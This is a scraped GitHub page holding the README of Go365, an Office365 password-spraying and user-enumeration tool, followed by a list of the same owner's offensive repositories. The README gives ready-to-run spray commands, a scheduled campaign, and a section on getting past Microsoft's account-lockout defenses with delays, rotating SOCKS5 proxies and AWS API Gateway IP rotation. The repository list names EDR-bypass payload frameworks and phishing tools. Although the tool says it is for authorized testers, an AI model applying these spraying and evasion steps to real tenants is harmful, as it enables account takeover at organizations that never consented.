• Stars
    star
    621
  • Rank 72,294 (Top 2 %)
  • Language
    Go
  • License
    MIT License
  • Created over 4 years ago
  • Updated 8 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

An Office365 User Attack Tool

Go365 v2.0

  • Fixed AWS gateway issues (thanks h0useh3ad!)
  • No longer dies when proxy server connections fail
  • Added the graph endpoint

Please read all of this README before using Go365!

Go365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.

* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or funtionality to perform only user enumeration. Instead, conduct your first password guessing attack, then parse the results for valid users.

Read these three bullets!
  • This tool might not work on all domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!
  • The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!
  • This tool is intended to be used by security professionals that are authorized to "attack" the target organization's o365 instance.

Obtaining

Option 0

Download a pre-compiled binary for your OS HERE.

Option 1

Download the source and compile locally.

  1. Install Go.
  2. Clone the repo.
  3. Navigate to the repo and compile ya dingus.
go build Go365.go
  1. Run the resulting binary

Usage

$ ./Go365

  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€        โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
 โ–ˆโ–ˆโ€โ€โ€โ€โ€โ€       โ€โ€โ€โ€โ€โ€โ–ˆโ–ˆโ€โ–ˆโ–ˆโ€โ€โ€โ€โ€โ€ โ–ˆโ–ˆ
 โ–ˆโ–ˆโ€ โ–ˆโ–ˆโ–ˆโ€  โ–ˆโ–ˆโ–ˆโ–ˆโ€โ€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€โ€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
 โ–ˆโ–ˆโ€   โ–ˆโ–ˆโ€โ–ˆโ–ˆโ€ โ–ˆโ–ˆโ€ โ€โ€โ€โ€โ–ˆโ–ˆโ€โ–ˆโ–ˆโ€โ€โ€โ€โ–ˆโ–ˆโ€โ€โ€โ€โ€โ€โ–ˆโ–ˆ
โ€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€โ€โ€โ–ˆโ–ˆโ–ˆโ–ˆโ€โ€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€โ€โ€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ€โ€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ

 Version: 2.0
 Authors: paveway3, h0useh3ad, S4R1N, EatonChips

Usage:

  -h                            Shows this stuff


  Required - Endpoint:

    -endpoint [rst or graph]    Specify which endpoint to use
                                : (-endpoint rst)   *Classic Go365!* login.microsoftonline.com/rst2.srf. SOAP XML request with XML response
                                : (-endpoint graph)  login.microsoft.com/common/oauth2/token. HTTP POST request with JSON Response

  Required - Usernames and Passwords:

    -u <string>                 Single username to test
                                : Username with or without "@domain.com"
                                : Must also provide -d flag to specify the domain
                                : (-u [email protected])

    -ul <file>                  Username list to use (overrides -u)
                                : File should contain one username per line
                                : Usernames can have "@domain.com"
                                : If no domain is specified, the -d domain is used
                                : (-ul ./usernamelist.txt)

    -p <string>                 Password to attempt
                                : Enclose in single quotes if it contains special characters
                                : (-p password123)  or  (-p 'p@s$w0|2d')

    -pl <file>                  Password list to use (overrides -p)
                                : File should contain one password per line
                                : -delay flag can be used to include a pause between each set of attempts
                                : (-pl ./passwordlist.txt)

    -up <file>                  Userpass list to use (overrides all the above options)
                                : One username and password separated by a ":" per line
                                : Be careful of duplicate usernames!
                                : (-up ./userpasslist.txt)

  Required/Optional - Domain:

    -d <string>                 Domain to test
                                : Use this if the username or username list does not include "@targetcompany.com"
                                : (-d targetcompany.com)

  Optional:

    -w <int>                    Time to wait between attempts in seconds.
                                : Default: 1 second. 5 seconds recommended.
                                : (-w 10)

    -delay <int>                Delay (in seconds) between sprays when using a password list.
                                : Default: 60 minutes (3600 seconds) recommended.
                                : (-delay 7200)

    -o <string>                 Output file to write to
                                : Will append if file exists, otherwise a file is created
                                : (-o ./Go365output.out)

    -proxy <string>             Single SOCKS5 proxy server to use
                                : IP address and Port separated by a ":"
                                : SOCKS5 proxy
                                : (-proxy 127.0.0.1:1080)

    -proxyfile <string>         A file with a list of SOCKS5 proxy servers to use
                                : IP address and Port separated by a ":" on each line
                                : Randomly selects a proxy server to use before each request
                                : (-proxyfile ./proxyfile.txt)

    -url <string>               Endpoint to send requests to
                                : Amazon API Gateway 'Invoke URL'
                                : Highly recommended that you use this option. Google it, or
                                : check this out: https://bigb0sss.github.io/posts/redteam-rotate-ip-aws-gateway/
                                : (-url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login)

    -debug                      Debug mode.
                                : Print xml response

Examples

  ./Go365 -endpoint rst -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com
  ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5
  ./Go365 -endpoint rst -up ./userpass_list.txt -delay 3600 -d pwnthisfakedomain.com -w 5 -o Go365output.txt
  ./Go365 -endpoint graph -u legituser -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxy 127.0.0.1:1080
  ./Go365 -endpoint rst -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt
  ./Go365 -endpoint graph -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login

  You can even schedule out your entire password guessing campaign using the -pl and -delay flags :)
  ./Go365 -endpoint rst -ul ./user_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://notrealgetyourown.execute-api.us-east-2.amazonaws.com/login -proxyfile listofprox.txt -pl listofpasswords.txt -delay 7200

  *Protip: If you get a lot of "Account locked out" responses, then you might wanna proxy or use an AWS Gateway.

Account Locked Out! (Domain Defenses)

protip: You probably aren't actually locking out accounts.

After a number of queries against a target domain, results might start reporting that accounts are locked out.

Once this defense is triggered, user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out.

...
[-] User not found: [email protected]
[-] User not found: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
[!] Account Locked Out: [email protected]
[-] Valid user, but invalid password: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
...

This is a defensive mechanism triggered by the number of valid user queries against the target domain within a certain period of time. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.

Countering Defenses

Wait time

The defensive mechanism is time and IP address based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.

A wait time of AT LEAST 15 seconds is recommended. -w 15

SOCKS5 Proxies

If you still get "account locked out" responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (ssh -D <port> user@proxyserver)

Create a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:

127.0.0.1:8081
127.0.0.1:8082
127.0.0.1:8083
127.0.0.1:8084
127.0.0.1:8085
127.0.0.1:8086
...

The tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.

-w 15 -proxyfile ./proxies.txt

Amazon API Gateway

Additionally, an endpoint url may be specified so this tool can interface with Amazon API Gateway. Setup a gateway to point to the https://login.microsoftonline.com/rst2.srf endpoint, then set the -url parameter to the provided Invoke URL. Your IP should be rotated with each request.

-url https://justanexample.execute-api.us-east-2.amazonaws.com/login

More Repositories

1

ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.
Go
2,730
star
2

Freeze

Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
Go
1,405
star
3

Mangle

Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL) to avoid detection from EDRs
Go
1,163
star
4

Ivy

Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivyโ€™s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
Go
738
star
5

Freeze.rs

Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls written in RUST
Rust
708
star
6

Talon

A password guessing tool that targets the Kerberos and LDAP services within the Windows Active Directory environment.
Go
431
star
7

mobile-nuclei-templates

390
star
8

Registry-Recon

Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon
321
star
9

Dent

A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.
Go
296
star
10

InsecureShop

An Intentionally designed Vulnerable Android Application built in Kotlin.
Kotlin
231
star
11

OSINT_Encyclopedia

Your go-to resource for all things OSINT
155
star
12

blemon

Universal BLE Monitoring with Frida (or Objection)
JavaScript
95
star
13

Microsoft365_devicePhish

A proof-of-concept script to conduct a phishing attack abusing Microsoft 365 OAuth Authorization Flow
Python
92
star
14

rest-api-goat

Python
69
star
15

KnockKnock

Enumerate valid users within Microsoft Teams and OneDrive with clean output.
Python
56
star
16

rustyIron

rustyIron is a tool that takes advantage of functionality within Ivanti's MobileIron MDM solution to perform single-factor authentication attacks. rustyIron can locate the MobileIron MDM authentication endpoint, validate the authentication strategy of the environment, perform user enumeration, brute-force registration PIN values, and perform single-factor authentication attacks.
Go
43
star
17

airCross

airCross is a tool that takes advantage of API functionality within VMWare's AirWatch MDM solution to perform single-factor authentication attacks. airCross can locate AirWatch authentication endpoint, validate the authentication strategy of the environment, collect GroupID authentication values, conduct single-factor authentication, and perform user enumeration, in some instances.
Go
39
star
18

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability
Go
25
star
19

nvdsearch

A National Vulnerability Database (NVD) API query tool
Go
17
star
20

doppelganger

Doppelgรคnger is firmware that runs on ESP32 devices that can be embedded within commercially available RFID readers with the intent of capturing access control card data while performing physical security assessments. Doppelgรคnger keeps the operator's ease of access, maintenance, and operational communications in mind.
C++
13
star
21

DATP_Queries

Microsoft Defender ATP Advanced Hunting Queries
10
star
22

Yara-Rules

YARA
9
star
23

netneedle

Network based steganography based control channels and chat.
C
8
star
24

showSSID

Python
7
star
25

Luhn-Calculator

A very simple Burp extension to make it easier to enumerate credit cards in the Intruder.
Python
6
star
26

burp-reset-a-tron

reset-a-tron Burp extension
Python
6
star
27

android-ndk-crackme

A simple NDK-based application on which to demonstrate some important attack strategies.
Java
5
star
28

burp-IBM-WebSphere-Portlet-Decoder

BurpSuite plugin for decoding IBM WebSphere Portlet States
Python
5
star
29

burp-java-deserializer

Java
4
star
30

warmap-go

CSS
4
star
31

VisualLockPickingWorkstation

The Visual Lock Picking Workstation is a Raspberry Pi enclosure which makes it possible to capture live video from a cutaway lock. It is intended as an instructional device which can be used to display the inner workings of a lock while teaching lock picking.
4
star
32

burpshellshock

Shellshock scanner for Apache MOD_CGI
Java
3
star
33

azure_runbooks

2
star
34

talus_client

Python
2
star
35

pyautoaws

Simple Python wrapper for Terraform/Ansible to build AWS resources
HCL
2
star
36

checkpassword-.net

HIBP Pwned Passwords API Client for .NET apps
C#
2
star
37

talus

Python
2
star
38

Lightning-Action-Editor

Java
1
star
39

azure-api-management-tracing-helper

Java
1
star
40

captcha-solve

Python
1
star
41

checkpassword-java

HIBP Pwned Passwords API client for Java projects
Java
1
star
42

terraform-eks

Terraform/Amazon EKS Deployment Starter Scripts
HCL
1
star